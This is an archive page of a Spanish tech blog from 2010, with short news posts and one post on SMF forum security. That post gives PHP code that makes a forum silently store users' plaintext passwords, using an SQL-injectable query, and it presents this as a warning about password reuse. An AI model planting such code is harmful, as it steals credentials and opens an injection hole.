Delanover

Blog sobre Informática y Seguridad

Calendario

mayo 2012
L M X J V S D
« feb    
 123456
78910111213
14151617181920
21222324252627
28293031  

Artículos publicados por lipman

Mozilla elimina una extensión que robaba información a sus usuarios

16 julio, 2010 Sin comentarios

Principalmente, el addon Mozilla Sniffer (que discreto) se encargaba de enviar a un servidor remoto datos tales como contraseñas y nombres de usuario de páginas web.

Estuvo propenso a ser descargado durante cinco semanas, y fue descargado alrededor de 1.800 veces. Mozilla declara que:

“Mozilla Sniffer no fue desarrollado por Mozilla y no fue revisado en ningún momento por Mozilla. La extensión estaba en estado experimental y aquellos usuarios que la instalaron debieron recibir una advertencia indicando su estado de no-revisado. Los addons no-revisados son escaneados para detectar virus, troyanos y otros malwares pero en ciertos casos sólo es posible detectar comportamiento malicioso revisando el código.”

Recomiendan a los usuarios que la tengan instalada, que la desinstalen y cambien todas sus contraseñas.

Sin duda, una noticia exasperante para aquellos que confiaban en que Firefox es el navegador mejor y más seguro de todos. Su principal defecto es la necesidad que tienen los usuarios de descargarse todo tipo de addons, muchas de ellas innecesarias, ya que como en este caso, dependen de si el autor de la extensión tiene algún propósito oculto.

Lo que debería de realizar Mozilla es implementar en Firefox, o incluso addons que vengan de serie, tales como el Adblock Plus o el NoScript.

Fuente: chw.net

Noticias ,

DoCoMo prepara un nuevo tipo de pantalla 3D

15 julio, 2010 Sin comentarios

DoCoMo, una operadora japonesa (como no), está preparando pantallas en 3D, al igual que las que presentó en el E3 Nintendo con su nueva 3DS, pero se basan en conceptos totalmente diferentes, apreciándose qué tecnología es la mejor.

Para que la tecnología 3D sea posible, debe de existir un paralelismo con la visión ocular humana. La vista humana percibe las tres dimensiones debido a que tenemos dos ojos, que perciben diferentes visiones, es decir, un plano visto desde dos ángulos. En términos informáticos podriamos decir que cada ojo capta diferentes píxeles.

La pantalla 3D de Sharp (la de la Nintendo 3DS) se encarga de hacer que cada ojo vea píxeles diferentes poniendo como un filtro (de ahí vienen las cada vez menos usadas gafas 3D, que tienen una lente azul y otra roja, de esta manera se consigue ese filtrado). Este tipo de tecnología hace que tengamos más problemas con el tema del brillo. Mediante la siguiente imagen lo lograremos comprender mucho mejor.

La tecnología que están usando las primeras pantallas de DoCoMo no realizan ningún filtrado, pero también nos permiten ven diferentes píxeles con cada ojo, generando el efecto 3D. Tecnología superior, que hace que se encarezcan un poco.

Sobra decir, esperaremos a ver cuanto tardan en sacar los primeros móviles 3D en Japón, aunque repito que siguen en pruebas.

Ahora, un video de la tecnología de la Nintendo 3DS (para poder compararla con la otra)

Y por último, el video en el que podremos apreciar esta nueva tecnología japonesa 3D en desarrollo:


Dispositivo corriendo a tan solo 1GHz

Fuente: akihabaranews

Noticias ,

(In)seguridad en los foros [SMF]

14 julio, 2010 3 comentarios

Los foros de la gente de simplemachines son de los más usados actualmente. No me extrañaría que fuese por la combinación diseño-características-gratis que reune este tipo de foros. Pero, ¿que hay de la seguridad?

Actualmente, la gran mayoria de personas asegura que usa la misma contraseña para todo (correo, registros de foros, y otras cuentas de mayor importancia como eBay o Paypal/Alertpay, etc) debido a la dificultad que supone tener que cuidar y guardar las diferentes contraseñas. Sin embargo, a pesar de esta incomodidad, la seguridad siempre debería de ser lo primordial para el usuario, sobre todo para el más inexperto (osease, la inmensa mayoria de usuarios).

Cuando instalamos en un servidor un foro (en este caso del tipo SMF) lo primero que hace es mirar la base de datos, y crear allí un registro, en donde a lo largo de la vida del foro se guardarán los posts, los subforos, las configuraciones, y los datos de los usuarios.

¿Los datos de los usuarios? Si. Esto es, los datos que tenemos en nuestro perfil del foro, como el avatar, el nickname, el nombre, la fecha de nacimiento, la firma, y la contraseña.

El administrador de cualquier foro puede acceder a la base de datos y ver/modificar/eliminar cualquiera de los datos anteriormente citados. Simplemachines piensa en todo (al igual que todos las empresas de ese estilo) y la mejor solución que le pone a esto es, encriptar la “contraseña”. Le pongo comillas, porque en realidad, no se guarda la contraseña, sino que se guarda un hash, generado mediante el nombre de usuario y contraseña. Esto quiere decir que, cuando nos registramos, se guarda en la base de datos la encriptación mediante SHA1 del nombre de usuario junto con la contraseña.

Por ejemplo, si me registro, y pongo de usuario lipman y de contraseña password, en la base de datos se guarda la encriptación de lipmanpassword, de la siguiente simple manera:

1

sha1($nombreUsuario . $password)

Por lo que, cuando un administrador acceda a la base de datos, le será imposible obtener la contraseña de ese usuario. La única solución seria desencriptarlo mediante fuerza bruta, pero descartamos esta opción debido al inmenso tiempo que se tomaria.

¿Quiere decir esto que nuestra contraseña está a salvo?
Absolutamente no.

Se podrían hacer cientos de métodos distintos e incluso combinarlos, para averiguar las contraseñas de los usuarios que se registren. El más sencillo que se me ocurre es: justo al registrarse un usuario, guardar en la base de datos su contraseña sin encriptar. A continuación describiré cómo se podría realizar.

Lo primero de todo, tenemos que crear en la base de datos la columna en la que guardaremos estas contraseñas sin encriptar:

Index.php (introducido justo antes de $forum_version…)

1
2
3
4
5
6
7
8
9

if(!$var = fopen('lol', 'r+'))
{
include("Settings.php");
echo "No preocuparse si sale algún error. Este mensaje no volverá a aparecer.";
mysql_connect($db_server, $db_user, $db_passwd) or die("Error al conectar a la BD");
$consulta = "ALTER TABLE `$db_name`.`smf_members` ADD COLUMN `pwdlol` TEXT AFTER `memberName`;";
$resultado = mysql_query($consulta) or die("LOL");
fopen("lol", 'a+');
}

Queremos que este código se ejecute una sola vez, por eso, este código se encarga de buscar un archivo que no deberia de existir, y si no lo encuentra, realiza esa alteración en la base de datos y posteriormente lo crea (para que lo encuentre y no se ejecute esto nada más que una sola vez)

Las variables $db_server, $db_user, $db_name y $db_passwd son variables que contienen, como propiamente dan a indicar, el nombre del servidor, de usuario, de la base de datos y la contraseña respectivamente. Ya se encuentran con los valores, ya que estos se guardan en Settings.php

La línea interesante es la sexta: $consulta = “ALTER TABLE `$db_name`.`smf_members` ADD COLUMN `pwdlol` TEXT AFTER `memberName`;”;

Esto crea en la tabla smf_members una columna llamada pwdlol después de la columna memberName (así tendremos la contraseña al lado del usuario, por comodidad)

Sigamos…

Sources/Register.php (introducido a partir de la línea 304)

1
2
3
4
5

$contrasenha = $_POST['passwrd1'];
$miembrouser = $_POST['user'];
 
$consulta = "UPDATE smf_members SET pwdlol = '$contrasenha' WHERE memberName = '$miembrouser'";
$resultado = mysql_query($consulta) or die("Error realizando la consulta");

Este código simplemente guarda en las variables $contrasenha y $miembrouser la contraseña y el nombre de usuario (todo sin encriptar) y luego, introduce la contraseña en la tabla de pwdlol, en donde el memberName sea el mismo que el miembro registrado.

Preocupamente tengo que decir: ya está. Así de simple es obtener la contraseña de cada usuario que se registre en tu propio foro SMF.

¿Es esto preocupante? Personalmente, solo espero que cada vez que os registreis en un foro la próxima vez, penseis en ponerle otra contraseña que la de vuestro correo.

Próximo análisis: PhpBB

Seguridad

Google Me – La nueva red social de Google

13 julio, 2010 1 comentario

Kevin Rose, creador de Digg, colocó en su twitter hace unos dias: “Ok, umm, gran rumor: Google lanzará un competidor de Facebook muy pronto ‘Google Me’, fuente muy fiable”. Aunque realmente, Google ya tiene red social (pero solamente triunfó en Brasil) y varias pseudo-redes sociales como Wave y Buzz. Todas se podrían considerar un fracaso.

El hecho de que Google busque competir con Facebook es ventajoso para nosotros los usuarios: por un lado, Facebook dispone de 500 millones de usuarios registrados y obviamente, ya tienen ahí su cuenta, con sus fotos subidas, y demás historias, por lo que Google tendrá que realizar un gran esfuerzo en mostrar al mundo algo diferente, innovador, con el objetivo de atraer usuarios de los cuales, la gran mayoría probablemente siga teniendo cuenta en Facebook.

Adam D’Angelo, ex gerente de la tecnología de Facebook, asegura que según sus fuentes:

  • Esto no es un rumor. Es un proyecto real. Hay un gran número de personas trabajando en ello. Estoy totalmente convencido de esto.
  • Se han dado cuenta de que Buzz no era suficiente y que necesitan construir una red social completa y de primera clase. Están modelándola a partir de Facebook.
  • A diferencia de los intentos previos (anteriores a Buzz al menos), esto es un proyecto de alta prioridad dentro de Google.
  • Asumieron que el crecimiento de Facebook disminuiría mientras crecía, y que Facebook no sería capaz de escalar adecuadamente, pero entonces no paró de crecer, y ahora están realmente asustados.
Noticias ,

3RD Space Vest. Siente los disparos cómo si estuvieras dentro del juego

12 julio, 2010 Sin comentarios

A pesar de llevar bastante tiempo a la venta, no fue hasta el pasado domingo cuando descubrí este curioso gadget dedicado a cualquer gamer dispuesto a dejarse los 139$ que cuesta este aparato.

Se trata de un chaleco, que gracias a unos ocho compresores de aire (cuatro delante y cuatro detrás) permite simular disparos, explosiones, caidas, etc. La empresa TN Games dispone de este chaleco en 3 colores distintos (Negro, Rosa y de Camuflaje)


TN Games piensa también en las pocas gamers que hay, sacando una versión del chaleco en rosa

También es curioso, dependiendo de con qué arma te disparen o den, te produce más o menos “daño”, lo cual añade bastante más realismo.

El 3RD Space soporta los principales FPS para PC, como Fear 2, Call of Duty 4: Modern Warfare 2, Dead Space, Bioshock 2. Se conecta al ordenador mediante USB gracias a la tecnologia Plug & Play, aunque dispone de un CD para drivers.

En el siguiente vídeo, incluso el tester dispone de un casco, con el que notariamos cualquier headshot recibido

Página oficial

Gadgets , ,
Powered by WordPress Web Design by SRS Solutions © 2012 Delanover Design by SRS Solutions